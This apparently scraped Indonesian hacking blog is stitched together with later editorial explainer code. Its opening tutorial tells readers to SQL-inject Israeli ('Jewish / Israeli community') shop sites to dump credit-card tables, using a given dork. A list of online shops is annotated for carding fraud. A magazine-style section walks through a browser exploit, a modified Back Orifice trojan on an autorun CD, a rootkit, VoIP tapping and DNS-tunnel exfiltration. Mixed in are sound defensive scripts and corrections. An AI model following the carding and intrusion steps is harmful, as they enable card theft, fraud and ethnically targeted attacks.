This time I am writing a carding tutorial, and the targets I attack are the Jewish / Israeli community.
Honestly, this tutorial is for noobs like me, hahaha
-------------------------------
Tools to prepare:
#. Google extractor
#. SQL exploiter, any version
-------------------------------
Steps, part 1
# Open Google extractor, then enter the dork product.asp?id= site:il (it must be il; if you use .id I'll curse you into a pig)
# Then scan; once the links appear, right-click and choose remove duplicates so you don't get confused
[Image: 24966_1256326613100_1377657451_30626880_2741170_n.jpg]
# Then switch to the SQL injector query builder tab
# Enter a question mark (?) as the argument in "insert arguments here"
# When done, click Build and Scan
[Image: 24966_1256327293117_1377657451_30626881_7835278_n.jpg]
# Then go to the next tab, attack victim
# Look for the ones whose error result is: unclosed quotation mark before the character ..... I don't know why, just follow along and don't ask too many questions :p
# Right-click and copy the victim URL
[Image: 24966_1256330213190_1377657451_30626907_5067141_n.jpg]
Part 2: using SQL exploiter
# Open SQL exploiter and go to the tab "attacker for the hackable SHIT!!"
# Click add manually, enter the victim URL from before, and paste it (sometimes the ' has to be removed)
[Image: 24966_1256337133363_1377657451_30626936_8328987_n.jpg]
# When done, click site info until the info appears
# Once it appears, just click get table; the site's tables will show up, which I have marked in blue
[Image: 24966_1256339053411_1377657451_30626940_4075654_n.jpg]
# Pick one of those tables, the one where you guess the CC data is, then click get column to see which columns the table has; this time I did not go to the order table
# Once all the columns appear, drag all the columns and click get data
[Image: 24966_1256343293517_1377657451_30626944_1577372_n.jpg]
This tutorial was typed on my own keyboard :p
Credit: palembang hacker link and you who are reading this tutorial
I'm not teaching crime, this is just for information; if Interpol catches you, don't drag my name into it :p
I'm just an ordinary person whose job is to sit on the doomsday committee
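The error the tutorial tells you to look for has a plain explanation that the post leaves out. "Unclosed quotation mark ... the character string" is Microsoft SQL Server's message (worded "before" on SQL Server 2000, "after" on later versions) for a statement that ends inside a string literal. It shows up when the page pastes the id from the URL straight into its SQL text, so the extra quote becomes part of the statement. The script below is an added example, not code from the post or from the tools it names: it builds the same product lookup both ways, concatenated as a vulnerable product.asp would, and with a bound parameter, which is the fix. SQLite stands in for SQL Server so it runs offline (its wording for the same fault is a generic syntax error); the table, rows and function names are constructed for the example.

```python
"""Why a stray quote in product.asp?id= yields 'Unclosed quotation mark'.

Added example, not part of the original post. SQLite stands in for SQL
Server so this runs offline; the catalogue below is constructed.
"""
import sqlite3


def make_db():
    """Constructed sample catalogue standing in for the shop's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE product(id INTEGER PRIMARY KEY, name TEXT, price REAL);"
        "INSERT INTO product VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);"
    )
    return conn


def lookup_vulnerable(conn, product_id):
    """Classic ASP style: the id from the query string is pasted into the SQL text."""
    sql = "SELECT name, price FROM product WHERE id='" + product_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, product_id):
    """Parameterised: the id is bound as a value and is never parsed as SQL."""
    sql = "SELECT name, price FROM product WHERE id=?"
    return conn.execute(sql, (product_id,)).fetchall()


def probe(conn, product_id):
    """Classify what the concatenated query does with a given id value.

    'syntax error' means the value broke the statement (the signal the tutorial
    searches for), 'extra rows' means it returned more than the single product
    an id should match, 'ok' means the value behaved as plain data.
    """
    try:
        rows = lookup_vulnerable(conn, product_id)
    except sqlite3.OperationalError:
        return "syntax error"
    return "extra rows" if len(rows) > 1 else "ok"


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1' OR '1'='1"):
        print(f"id={value!r:<16} concatenated: {probe(db, value):<12} "
              f"parameterised: {lookup_safe(db, value)}")
```

The parameterised lookup returns the one product for "1" and nothing at all for the other two values, because the quote never reaches the SQL parser; that is the whole fix, and it is why a site that only strips the quote from the URL (as the tutorial hints some do) is not actually safe.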
Seftian Hacking,Networking,Programing
Welcome To My Territory Just For Study.!!!
Wednesday, 15 June 2011
Online Shop Info
http://www.frontier-outfitters.com/ Cowboy accessories shop, ships to Indonesia
http://timeclub.com/ Nice watch shop, ships to Indonesia (*many orders have already gone through!*)
http://kahuna-uk.com/ Beach-themed shop, ships to Indonesia
http://kahuna.com.au/ Beach-themed shop, ships to Indonesia
http://www.clixtore.de/ Shop in Germany, the operators are still pretty clueless
http://www.greatreplicas.com/ Replica watch shop, ships to Indonesia
http://www.window-shopping.de/ Shop in Germany, ships to Indonesia
http://www.poljot.de/ Watch shop, ships to Indonesia
http://www.netzmarkt.de/ Shop in Germany, no harm in trying!
http://www.sportshop2000.de/ Shop in Germany, ships to Indonesia
http://www.mercurycut.it/ Knife shop in Italy, ships to Indonesia
http://www.agemont.it/ Knife shop in Italy, ships to Indonesia
http://www.americanpuzzles.com/ Watch shop in the US, no harm in trying!
http://www.switchblades.it/ Knife shop in Italy, ships to Indonesia
http://www.festinashop.de/ Watch shop in Germany, no harm in trying!
http://www.sb-sportswear.com/ Sportswear shop in Italy, ships to Indonesia
http://sportswearhouse.co.uk/ Sportswear shop in the UK
http://handbag.com/ Has wristwatches
http://www.linkonline.co.uk/ Want to order a television? This is the place!
http://www.lazer.co.uk/ Want to order a Game Boy? You can here!
http://www.cd-wow.com/ Compact disc shop
http://www.cdnow.com/ Compact disc shop
http://bizrate.com/ Electronics and more!
http://www.harrodsonline.com/ Al Fayed's shop, ships to Indonesia
http://ashford.com/ Luxury electronics, souvenirs, jewellery and more, ships to Indonesia
http://sawmall.com/ Shop directory, just pick what kind of goods you want
http://nike.com/ Official Nike store
http://siemens.com/ Official Siemens store
http://reef.com/ Big company's shop, if you want to hack it, go ahead....
http://radioclick.com/ Shop in Indonesia, better not!
http://store.pragakhan.com/ T-shirt shop, ships to Indonesia
http://outpost.com/ No harm in trying!
http://cirqueshop.com/ Ships to Indonesia
http://chips.com.au/ Ships to Indonesia
http://www.diamondringsusa.com/ Jewellery shop, ships to Indonesia
http://cdeals.com/ Ships to Indonesia
http://myerdirect.com.au Shop in Australia, ships to Indonesia
https://catalogue.maplin.co.uk/ Shop directory, many ship to Indonesia
http://www.shopspy.co.uk/ UK shop directory, many can ship to Indonesia
http://www.eshops.co.uk/ Ships to Indonesia, luxury electronics....
http://www.phoneshop.uk.com/ Phone shop in the UK
http://www.shopmate.co.uk/ Shop in the UK
http://www.7dayshop.com/ Ships to Indonesia
http://www.shoppingtrolley.net/mobile-phones-gsm.shtml Mobile phone shop directory
http://www.directphones.co.uk/ Mobile phone shop
http://www.findaroo.com/topoftheweb/ Links to other shops
http://www.mobileshop.co.uk/ Mobile phone shop in the UK
http://www.webhideout.com/index2.html Links to other shops
https://www.ecommercesoftware.co.uk/ Ships outside the UK
http://www.thefutureonline.net/ Ships to Indonesia
http://www.widget.co.uk/ Ships to Indonesia
http://www.ezcomputers.co.uk/ Ships to Indonesia
http://www.shoppingplanet.com/ No harm in trying!
http://www.hotbuyselectronics.com/ Ships to Indonesia
http://www.goroyalpc.com/ Ships to Indonesia
http://www.oakley.com/ Doesn't ship to Indonesia yet
http://www.surveillancesolutions.com/ Ships to Indonesia
https://www.diamond.com/ Ships to Indonesia
http://208.231.28.129/ No harm in trying
https://www.gold-jewelry.co.uk/ Ships to Indonesia
http://www.fashiontime.net/ Indonesia is blacklisted here, check for yourself!
http://www.xe.net/ Need a currency converter? This is the place (in its pop-up window)
http://translator.dictionary.com/ Need a translator for shopping sites that aren't in English?
Monday, 13 June 2011
Blocking Sites on the Network
First create a file with your favourite editor; here I use:
Code:
presiden@root#vim /etc/squid/bloksitus.txt
Then enter the sites you want to block. For example, to block Facebook, enter
.facebook.com <<< with the leading dot, because we also want to block all of its subdomains. After that, open Squid's configuration file at /etc/squid/squid.conf and add the lines below:
Code:
acl blokir url_regex "/etc/squid/bloksitus.txt"
deny_info http://netheroes.org blokir
acl waktu time MTWTFS 19:00-24:00
http_access allow blokir waktu
http_access deny blokir
Explanation: "deny_info http://netheroes.org blokir" means that when a CLIENT accesses a site listed in the file created above, it is automatically redirected to netheroes.org. "acl waktu time MTWTFS 19:00-24:00" means the CLIENT may only access the blocked sites between 19:00 and 24:00.
A few things to check before copying this. Squid's time ACL uses one letter per day (S Sunday, M Monday, T Tuesday, W Wednesday, H Thursday, F Friday, A Saturday; D stands for Monday to Friday), so "MTWTFS" leaves out Thursday and Saturday and should read "MTWHFA" for a Monday-to-Saturday window. In a url_regex the dot is a regex wildcard, and "facebook.com" on its own already matches every subdomain (and any URL that merely contains that text); the leading-dot convention for "domain plus all subdomains" belongs to the dstdomain ACL type. And because Squid applies the first matching http_access rule, these lines must come before any general "http_access allow" for your LAN.
I have tried the config above and it works; I tested it on openSUSE 11.2 and have not tried other Linux distributions yet. Credit: NetHeroes.org
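The same policy with those corrections applied, as an added example rather than the post's own configuration (the file path and the redirect URL are taken from the post; the use of dstdomain, the day letters and the placement comments are the editor's):

```conf
# /etc/squid/bloksitus.txt: one entry per line; the leading dot tells
# dstdomain to match the domain and all of its subdomains, e.g.
#   .facebook.com

# In /etc/squid/squid.conf, ahead of the general http_access allow rules:
acl blokir dstdomain "/etc/squid/bloksitus.txt"
# Day letters: S Sun, M Mon, T Tue, W Wed, H Thu, F Fri, A Sat; D = Mon-Fri
acl waktu time MTWHFA 19:00-24:00
deny_info http://netheroes.org blokir
http_access allow blokir waktu
http_access deny blokir
# ... followed by the usual http_access allow localnet / http_access deny all
```

Run `squid -k parse` to check the syntax and `squid -k reconfigure` to load it without restarting; a request for a listed domain outside the window is answered with a redirect to the deny_info URL, inside the window it is allowed through.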
Revealing the Hacker's Secrets
Smuggling in a rootkit, reading confidential documents and tapping phone calls can all be done with ease. With the simulated attacks that follow, you will better understand how hackers attack and how to counter them.
Have you protected your PC with a firewall, antivirus and service pack?
If so, your PC is safer against viruses and hackers. But a PC is not really safe until you have installed the latest patches, so do not be surprised if an 'uninvited guest' turns up one day. Even with the latest patches installed, there is no guarantee that your PC is 100% safe. With a 0-day exploit (a hole that is not yet known and not yet patched), a hacker can get through a seemingly secure firewall in a few seconds. With nothing more than a modified CD, even the best-secured firewall can be bypassed. The authors tried this out and simulated the most dangerous attacks using hackers' latest methods, including rootkits. A few colleagues were chosen as targets for the simulated attacks.
The result was startling: given the will, an attacker can take over the victim's PC with ease. How does it work, and which preventive steps effectively protect your PC? Read on.
1. Spying on the Victim
Rule number one for a successful intruder or hacker is to know the enemy well. One effective way to get to know the victim is to learn how they behave when using a web browser. Since 90% of surfers still use Internet Explorer, the task is made easier. More interesting still, many companies continue to use the Microsoft programs that came pre-installed on the PC.
The hacker only needs to lure the victim to a website prepared for the purpose and exploit a weakness in the browser.
Attack: We planned to take over the browser, and with it the PC, through a buffer overflow exploit. For that, the victim's software had to be identified, which can be done by luring the victim to a web address built to identify the browser; that reveals the browser's name and version. The more recent the patches installed on the browser, the smaller the chance of attacking it successfully, which is why the victim's browser has to be identified first. Conveniently, the browser announces its identity itself (the User-Agent header in every HTTP request), so the web server only needs to read it. The exact file version also matters, because most buffer overflows only work against specific browser versions. We then found a versatile 0-day exploit for Internet Explorer 6. '0-day exploit' is the term for a very new security hole for which no patch exists yet.
We obtained additional information from FrSIRT, the security firm that demonstrated the hole with a 'proof of concept'. It states exactly where the hole can be exploited, which makes it easier to mount an attack.
In the example, the proof of concept does no more than launch the Windows calculator, and we could slip a backdoor into its script. The backdoor then becomes the 'entry door' for other malicious tools into the system. Backdoor scripts are widely available on the Internet, so the attack can be carried out by copy and paste, script-kiddie style. Now we had to get the victim to open the prepared website, so we sent an e-mail with a special link we expected the victim would find very tempting to click. With this simple trick the attack went through without problems: after the victim clicked the link, Internet Explorer opened and promptly crashed, a sign that the backdoor had been installed on the victim's PC.
Countermeasure: Use an alternative browser such as Firefox or Opera. Security experts have found dangerous holes in those browsers too, but they are exploited by hackers less often; hackers generally prefer Internet Explorer because it is more widely used.
Caution: Do not open links in e-mails carelessly. Treat e-mail from senders you do not know with great care.
2. Getting Through the Firewall
Knowing how to deceive and disguise perfectly matters to a spy. The same goes for a hacker who wants to smuggle a trojan in on a CD without arousing anyone's suspicion, so that the user has no idea of the danger. Few people realise that a demo CD with an attractive splash screen and content can carry a trojan.
Attack: This time we did not install a backdoor to bring in the trojan; instead we used the capacity of the medium and packed the trojan directly onto the CD. The tool chosen was the classic trojan 'Back Orifice 2000', because this open-source trojan is easy to modify: a little new code and a different compiler, and most antivirus programs no longer detect it. So that the trojan installs as soon as the CD goes into the drive, we took an existing demo CD and built a setup routine with the free Nullsoft Scriptable Install System (NSIS); the difference is that this installation also includes the trojan. We also gave the trojan an autorun function, so the installation starts automatically when the CD is inserted. The victim only has to insert the CD and the trojan goes to work. In the example, the trojan records every keystroke and reports it, which is useful to a hacker who wants to learn the victim's habits and the confidential data on the PC.
Countermeasure: There is no perfect defence against this kind of attack. But what applies to e-mail also applies to CDs: do not install programs you do not know. In practice that is hard to follow. A better approach is a dedicated test PC that is not connected to the network, so a trojan cannot do damage to other PCs.
3. Becoming Invisible
The third tenet of espionage is to infiltrate while remaining unseen. For PC espionage this means a rootkit is needed, and a simple backdoor has to be turned into a super trojan. Once inside the system, such a trojan is hard to find and harder still to remove.
The best-known rootkit for Windows is the 'FU Rootkit'. It hides the malicious program from Task Manager, so the trojan can no longer be stopped. Modern rootkits such as 'Beast' hide even more, including registry entries, TCP/IP connections and files on the hard disk.
Without special programs, even an advanced user cannot find such a trojan, let alone remove it, because the rootkit redirects Windows functions and manipulates the answers an ordinary antivirus relies on (see the box Rootkit: The Invisible Danger).
Attack: We extended 'Back Orifice 2000' with a rootkit function from 'FU Rootkit'. This is as easy as integrating a plug-in into Photoshop: all that is needed is to install a rootkit plug-in and specify which files should later be invisible to the user. For the test, we hid the trojan and all the files it creates, such as the keylogger's log file.
Countermeasure: There is almost nothing you can do against this kind of stealth technique. Once a trojan has installed itself on the system, it can only be removed with a special tool, such as RootkitRevealer from Sysinternals.
Beyond that, you also have to know your PC well to find the trojan, because information such as storage locations and Windows functions has to be properly understood. A dilemma arises with harmless programs such as Daemon Tools: this free tool for creating virtual drives unfortunately also uses rootkit-like techniques to integrate itself invisibly into the system.
ROOTKIT: THE INVISIBLE DANGER
How Hackers Fool Antivirus Programs. Rootkits lodge so deep inside the operating system that security programs generally fail to detect them. These sophisticated trojans are a collection of tools that can record passwords, give the hacker access, log keystrokes or eavesdrop on the network without being seen.
The security specialist F-Secure has warned about the danger of rootkits, which still hold great potential for camouflaging viruses and worms. There is already a worm that uses the rootkit method from Sony's copy protection (see the box Protection with Hacker Methods).
Antivirus programs often fail to notice a rootkit. Unlike ordinary malware, which works at user level, a rootkit hooks itself into the Windows API (Application Programming Interface). Programs, including antivirus and firewall, use the API to invoke basic operating-system functions such as access to the hard disk or the registry.
The rootkit then intercepts every request and decides which data the security application is allowed to see. If a virus scanner searches for the rootkit's file names, those entries are filtered out of the operating system's answer, and the trojan is not found.
Finding a rootkit: Fortunately, most Windows rootkits are still imperfect. The trojan 'Slanret', for example, is built as a system driver, so it becomes visible in Windows Safe Mode. Slanret also frequently causes crashes.
Other clues to the presence of a rootkit include hard disk space that shrinks drastically, CPU performance that drops sharply for no clear reason, and unknown Internet connections. Advanced PC users typically use RootkitRevealer to find out which APIs have been redirected. You can also compare the files on the hard disk with a known-clean backup made earlier.
Removing a rootkit: The most drastic and most reliable way to get rid of a rootkit or other hacker tool is to format the hard disk and install a fresh system.
As a precaution, you should also change all your passwords. Special tools for finding and removing rootkits, such as RootkitRevealer (http://www.sysinternals.com) or BlackLight (http://www.fsecure.com), are complicated to use and better suited to advanced PC users. A simple tool for removing the various rootkit variants, such as the rootkit in Sony's audio CD copy protection, is unfortunately not yet available. Rootkits have one thing in common with ordinary malware: a patched PC with a firewall and antivirus is well protected against them, provided the user does not carelessly open suspicious e-mail attachments or download files from unknown authors.
Info: http://www.rootkit.com
PROTECTION WITH HACKER METHODS
How Companies Use Hacker Tricks. Anyone who buys a Sony BMG audio CD, a Xerox printer or a game from Blizzard Entertainment does not expect cunning hacker tricks. Unfortunately, what these large companies do still falls into a legal 'grey' zone.
- An Audio CD That Phones Home
To protect its music from piracy, Sony BMG used an unusual copy protection. To listen to the music on a Windows PC, you have to install a player shipped on the CD. The problem is that something else is kept from the user: along with the player, a rootkit is installed that hides the copy-protection files from pirates. This only came to light after the programmer Mark Russinovich of Sysinternals published it. The copy protection, called XCP, makes the operating system unstable and opens connections to the Internet.
Blizzard, for its part, reads the title bar of every active program and forwards it to the game server. The danger: if an online banking window is open at the time, that information is forwarded too.
- Hidden IDs on Xerox Printers
Never print important or confidential documents on a Xerox colour printer. The problem: every printed page also carries a nearly invisible code. This was first published by the EFF (Electronic Frontier Foundation) in the US. The code contains the serial number and other identifiers (date, time), so a printout can be traced to its source even without the owner's name. The code, a few millimetres in size and made up of tiny yellow dots, can only be found if you know where to look, and then it has to be magnified 10x under a microscope.
Who benefits is unclear; speculation ranges from Xerox support to US intelligence agencies. After the EFF published the information, Xerox promptly held a press conference, arguing that the method is used to prevent document forgery.
4. Tapping Phone Calls
Hear everything and tell nothing is rule number four. Tapping phone calls has long ceased to be the privilege of intelligence agencies. Where a few years ago the many holes in ISDN installations attracted hackers, the target has now shifted to tapping VoIP calls on the Internet.
Attack: For the demo, we ran the tool 'Cain & Abel', which is available on the Internet. It offers not only common hacking functions such as password cracking but also lets you log the most frequently visited websites and record phone calls as WAV files. The only requirement is that the hacker is connected to the path all the data travels.
That can be done through a (W)LAN connection or a trojan on one victim's PC. We started with a 'man-in-the-middle' attack and intercepted the victim's data stream. For that, the trojan was told to send its data to our (CHIP's) machine first. After successfully intercepting it, the data was forwarded to the intended PC. The victims (sender and receiver) noticed nothing of the interception.
Countermeasure: The simplest immediate steps are to secure the LAN with MAC address filtering and to install an antivirus to block trojans. Note that MAC filtering only keeps unknown machines off the LAN; it does not stop ARP spoofing by a host that is already connected, which is where static ARP entries (see the tools section below) help. There are also solutions for encrypting VoIP calls, such as the Zfone tool from PGP's creator Phil Zimmermann.
The problem lies in compatibility: not every provider supports every Zfone version, so users can still lose their privacy.
5. Sending Data Out
The last and most important rule is not to get caught while spying.
Installing a trojan is only half the journey, because without a connection back even the most sophisticated trojan is useless. Since the victim's network infrastructure is not known precisely, we had to be prepared for various kinds of firewall, especially desktop firewalls that can block any active program, and an IDS (Intrusion Detection System) that analyses the content of every packet. So it is not enough simply to send data out of the PC; the information must also be disguised well enough not to stand out to security software.
'Back Orifice 2000' offers hardly any suitable free plug-in for this purpose. The only one, the 'SCTP' plug-in, does encrypt the data well so that no recognisable pattern remains, but unfortunately the method still carries the signature of trojan communication. A skilled hacker with a good stock of data-smuggling methods can nevertheless get through the firewall.
Attack: The favourite method is to use protocols that look harmless, such as HTTP, SMTP or DNS. We chose DNS tunnelling so as to pass every security check in the network without arousing suspicion: the information is packed into inconspicuous Domain Name packets. More than 90% of firewalls do not block this kind of packet because the DNS protocol is indispensable for establishing Internet connections. We encrypted a little information at a time and sent as few packets as possible so the IDS would not notice it.
An excessive exchange of Domain Name packets looks suspicious and is picked up by the IDS.
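The volume-based tell mentioned above is something a defender can act on. The following Python script is an added example, not from the article: it applies that idea to resolver query logs, grouping queries per client and zone and flagging a pair that issues many unique, long, high-entropy names, which is the shape tunnelled data takes. The log lines are constructed in the old BIND 9 query-log layout, the zone split (last two labels) is a simplification, and the thresholds are assumptions to tune per network.

```python
"""Spot DNS tunnelling in resolver query logs.

Added example, not part of the original article. The log below is
constructed, not captured.
"""
import collections
import hashlib
import math
import re

LOG_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>[A-Z]+)")


def _build_sample_log():
    """Constructed log: 10.0.0.5 browses normally, 10.0.0.7 runs a tunnel."""
    lines = []
    normal = ["www.google.com A", "mail.example.org MX", "www.google.com A",
              "update.microsoft.com A", "cdn.example.net A", "pool.ntp.org A"]
    for i, entry in enumerate(normal):
        qname, qtype = entry.split()
        lines.append(f"13-Jun-2011 19:04:{i:02d}.000 client 10.0.0.5#5{i:04d}: "
                     f"query: {qname} IN {qtype} + (192.168.1.1)")
    # Tunnel traffic: 40 hex characters of data in the leftmost label, a TXT
    # lookup each time, and a name that never repeats (so nothing is cached).
    for i in range(24):
        payload = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]
        lines.append(f"13-Jun-2011 19:05:{i:02d}.000 client 10.0.0.7#4{i:04d}: "
                     f"query: {payload}.t.exfil-test.example IN TXT + (192.168.1.1)")
    return lines


SAMPLE_LOG = _build_sample_log()


def parse_log(lines):
    """Extract client, qname and qtype from every line that matches the layout."""
    return [m.groupdict() for m in map(LOG_RE.search, lines) if m]


def shannon_entropy(text):
    """Bits per character: close to 4.0 for random hex, low for labels like 'www'."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(text).values())


def zone_of(qname):
    """Simplification: the last two labels stand in for the registered zone."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect(records, min_queries=10, min_unique_ratio=0.8, long_label=30, high_entropy=3.5):
    """Score each (client, zone) pair; the thresholds are assumptions to tune per network."""
    groups = collections.defaultdict(list)
    for r in records:
        groups[(r["client"], zone_of(r["qname"]))].append(r)
    findings = []
    for (client, zone), recs in groups.items():
        qnames = [r["qname"] for r in recs]
        leftmost = [q.split(".")[0] for q in qnames]
        unique_ratio = len(set(qnames)) / len(qnames)
        avg_len = sum(len(label) for label in leftmost) / len(leftmost)
        avg_entropy = sum(shannon_entropy(label) for label in leftmost) / len(leftmost)
        suspicious = (len(recs) >= min_queries
                      and unique_ratio >= min_unique_ratio
                      and (avg_len >= long_label or avg_entropy >= high_entropy))
        findings.append({"client": client, "zone": zone, "queries": len(recs),
                         "unique_ratio": round(unique_ratio, 2),
                         "avg_label_len": round(avg_len, 1),
                         "avg_entropy": round(avg_entropy, 2),
                         "qtypes": dict(collections.Counter(r["qtype"] for r in recs)),
                         "suspicious": suspicious})
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:<10} {f['client']:<10} {f['zone']:<22} n={f['queries']:<3} "
              f"len={f['avg_label_len']:<5} H={f['avg_entropy']:<5} {f['qtypes']}")
```

A tunnel that sends "as few packets as possible", as the article's attacker does, pushes the query count under min_queries for any one window; the uniqueness, length and entropy features still fire as soon as the count is reached, so a longer observation window rather than a lower count threshold is the usual answer.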
To get past a desktop firewall we used an injection attack: we picked a program guaranteed not to be blocked by the firewall, such as the default browser, whichever of Internet Explorer or Firefox that is.
Which one it is can easily be read from the Windows registry with a special trojan. Then we only had to wait until the unsuspecting victim started the program and loaded it into memory (RAM); at that moment the trojan hooked itself into the right process and used it for its own ends.
To find out whether the data smuggling worked, we instructed the trojan to send us the victim's Word documents, unnoticed, of course, by the owner and by the firewall.
Countermeasure: The contest between security companies and hackers looks like a 'vicious circle'. Firewalls, antivirus and IDS keep getting better at detecting and blocking attacks, but the attacks keep getting more sophisticated too. The better a hacker knows the target, the harder he is to identify. The problem is that for every protection mechanism there is usually a trick to get around it. It is therefore vital that an administrator keeps the PC and its security programs up to date.
http://www.rootkit.com: The most popular website on the subject of rootkits, with plenty of rootkit news and technical information.
http://www.bo2k.com: Website of the remote network administration tool developed from the classic Back Orifice trojan.
http://www.securityfocus.com: Latest PC security news and detailed expert analyses.
Hacker Tools
Anticipate hacker attacks by knowing how they work. The following tools can be used to secure your network.
Nmap: This port scanner finds every open port and every IP address on the network, so security holes can be closed.
Tip: To check every PC and port on your network, enter the following command (the SYN scan -sS and OS detection -O need root or administrator privileges):
nmap -v -sS -O 192.168.*.*
If a port that hackers commonly target is open, close it immediately to avoid attacks.
SwitchSniffer: A PC connected to a switch on the network only receives the packets addressed to it. With this tool you can 'divert' those packets to yourself.
Tip: To protect yourself from tools like SwitchSniffer, use the following command:
arp -s 192.168.0.1 00-aa-00-62-c6-09
It permanently fixes which MAC address belongs to a given IP address. The example uses the address of the router (the gateway to the Internet), which is the entry most often diverted.
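Pinning the router's entry is one half of the defence; noticing when the cache changes anyway is the other. The script below is an added example, not part of the article: it reads two arp -a listings (Windows layout, constructed rather than captured) and reports a pinned entry that no longer matches, an IP whose MAC changed between listings, and one MAC claiming several IPs, which is what a diverting tool like SwitchSniffer leaves behind in the victim's cache. The addresses are the article's router plus made-up hosts.

```python
"""Detect ARP cache poisoning from arp -a snapshots.

Added example, not part of the original article. Both snapshots are
constructed; the second shows the cache after 192.168.0.23 has claimed the
router's IP.
"""
import collections
import re

# One row of Windows "arp -a": IP, MAC, type. '-' and ':' separators accepted.
ARP_ROW = re.compile(
    r"^\s*(?P<ip>\d+\.\d+\.\d+\.\d+)\s+"
    r"(?P<mac>[0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\s+"
    r"(?P<kind>\w+)\s*$"
)

PINNED = {"192.168.0.1": "00-aa-00-62-c6-09"}  # the router, as in arp -s above

SNAPSHOT_BEFORE = """
Interface: 192.168.0.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           00-aa-00-62-c6-09     dynamic
  192.168.0.23          00-11-22-33-44-55     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

SNAPSHOT_AFTER = """
Interface: 192.168.0.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-33-44-55     dynamic
  192.168.0.23          00-11-22-33-44-55     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""


def normalise_mac(mac):
    return mac.lower().replace(":", "-")


def parse_arp_table(text):
    """Return {ip: (mac, kind)} from arp -a output; header lines are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m:
            table[m["ip"]] = (normalise_mac(m["mac"]), m["kind"].lower())
    return table


def check(table, pinned, previous=None):
    """Return a list of alert dicts; an empty list means nothing looked wrong."""
    alerts = []
    # 1. A pinned IP answering with a different MAC than the one we fixed.
    for ip, want in pinned.items():
        got = table.get(ip)
        if got and got[0] != normalise_mac(want):
            alerts.append({"kind": "pinned_mismatch", "ip": ip,
                           "expected": normalise_mac(want), "seen": got[0]})
    # 2. Any IP whose MAC differs from the previous listing.
    if previous:
        for ip, (mac, _) in table.items():
            old = previous.get(ip)
            if old and old[0] != mac:
                alerts.append({"kind": "mac_changed", "ip": ip,
                               "expected": old[0], "seen": mac})
    # 3. One MAC behind several dynamic IPs (static broadcast/multicast rows
    #    are skipped because they legitimately share nothing with hosts).
    by_mac = collections.defaultdict(list)
    for ip, (mac, kind) in table.items():
        if kind == "dynamic":
            by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append({"kind": "duplicate_mac", "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    before = parse_arp_table(SNAPSHOT_BEFORE)
    after = parse_arp_table(SNAPSHOT_AFTER)
    print("before:", check(before, PINNED))
    for alert in check(after, PINNED, previous=before):
        print("after: ", alert)
```

On a real machine, feed the script the output of `arp -a` captured at intervals; an `arp -s` entry that has been overwritten shows up as a pinned_mismatch, and the duplicate_mac alert is the quickest way to tell an honest address change (the router was replaced) from a poisoning (another host on the LAN now owns the router's IP).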
Ethereal (now Wireshark): SwitchSniffer diverts data but cannot display it; this tool can.
Tip: To keep your data from going to the 'wrong address', use encrypted connections such as HTTPS or SSH wherever possible.
Netcat: With this command-line tool you can easily set up an unprotected connection or copy files across the network, for example to simulate a server.
Tip: With a single line, this tool can act as a web server. Create your own index.html and start the server with the following entry (binding port 80 needs root; the file is sent as-is, without HTTP headers):
netcat -l -p 80 < index.html
Enter 'http://127.0.0.1/' in the address bar to access it. The browser's simple requests can be read in the server window.
ALL-IN-ONE SECRETMAKER 4.2.7 - freeware
http://www.secretmaker.com
Komplit, praktis, powerful, gratis: Banyaknya software keamanan yang ada di pasaran sekarang ini tentunya membuat Anda bingung memilih yang terbaik. Namun, semua masalah itu akan teratasi dengan software All-in-One Secretmaker 4.2.7.
Software ini menawarkan beberapa tool utama seperti Security Watchdog, Intruder Blocker, Spam Fighter, Pop-up Blocker, Banner Blocker,Movie Blocker, Privacy Protector, History Cleaners,Worm Hunter, Cookie Eraser, dan masih banyak lagi. Security Watchdog akan menjaga komputer dari para penyusup. Intruder Blocker dapat menjaga komputer dari spyware, trackware,dan virus.Spam Fighter akan membersihkan spam, dan juga dapat bekerja pada POP3 e-mail client. Banner Blocker akan mengurangi iklan-iklan yang tampil saat Anda berselancar. Movie Blocker menangkal iklan-iklan Flash yang dapat memperlambat aktivitas selancar Anda. Pop-up Blocker menghentikan popup yang tidak diinginkan. Privacy Protector akan menyembunyikan identitas Anda ketika berselancar. Terakhir, Cookie Eraser dan History Cleaner akan menghapus berbagai cookie dan jejak setelah Anda berselancar di dunia maya.
Apakah HDTV dapat direkam? Ternyata HDTV telah dapat dicrack!
Industri film ingin melengkapi semua format HDTV dengan proteksi copy HDCP. Dengan demikian, siaran HDTV tidak bisa direkam dan hanya bisa ditonton. Namun, blokade ini telah ditembus oleh sebuah minibox asal Korea dengan nama 'DVIHDCP'.
Ia mengubah sinyal yang diproteksi menjadi VGA dan dapat direkam tanpa masalah. Sebenarnya,
minibox ini tidak dirancang untuk pembajakan, tetapi untuk menampilkan HDTV melalui beamer/proyektor.
Para pengembang Firefox telah mengintegrasikan fungsi untuk menyingkirkan jejak-jejak yang masih tertinggal dalam Firefox setelah melakukan selancar. Buka "Tools | Clear private data", dan di bagian "Clear the following items now", aktifkan setiap jenis file yang akan dihapus, seperti "Cookies" dan "Cache". Selanjutnya,Anda tinggal menekan tombol "Clear private data now".
